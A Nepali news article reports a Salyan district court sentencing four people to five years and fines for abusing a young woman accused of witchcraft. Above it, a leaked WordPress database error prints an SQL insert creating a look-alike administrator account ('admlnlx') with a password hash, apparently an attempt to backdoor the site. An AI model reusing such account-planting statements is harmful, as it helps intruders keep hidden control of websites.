WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxjFyDMJskoT/8DAawGMPZgoQ6VRok/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 07:26:28', '', 'admlnlx', 'admlnlx')
सल्यान,पुस ५-
सल्यान कुपिण्डेदहकी एक महिलालाई वोक्सी भगाउन भन्दै अमानवीय व्यवहार गर्ने चार जनालाई जिल्ला अदालत सल्यानले पाँच वर्ष कैदको फैसला सुनाएको छ। कुपिण्डेदह–४ ज्यामिरेकी २० वर्षीया एक महिलालाई बोक्सी भगाउन भन्दै अमानवीय व्यवहार गर्ने सोही ठाउँका रुपलाल दमाई, पातली बुढा, पिमकली बुढा र कुपिण्डेदह ५ कि ४५ वर्षीय ललि पुनलाई ५ वर्ष कैद र जनही ५० हजार रुपैयाँको फैसला सुनाएको जिल्ला अदालत सल्यानका निमित्त श्रेष्तेदार हरि राम्जाले जानकारी दिए।
विरामी परेकी ती महिलालाई गएको जेठ २४ गते वोक्सी लागेको र भगाउने भन्दै निको बनाउने बहानामा मण्डलीमा राखेर सिस्नोले हानेको,, दिसा खुवाएको तथा कुटपिट गरेको पीडित पक्षले आरोप लगाएका थिए। जेठ २४ गते घटना भएको भएपनि पीडित महिलाको अवस्था नाजुक बन्दै गएपछि परिवारले ढिलोगरी साउन ५ गते मात्रै घटना सार्वजनिक गरेको थियो। घटनापछि प्रहरीले अमानवीय व्यवहार गरेको आरोपमा गएको साउन ६ गते ५ जनालाई पक्रेको थियो। जिल्ला न्यायाधीश माधवेन्द्रप्रसाद रेग्मीको इजलासले २१ वर्षिया रुपा थापालाई भने सफाई दिएको छ।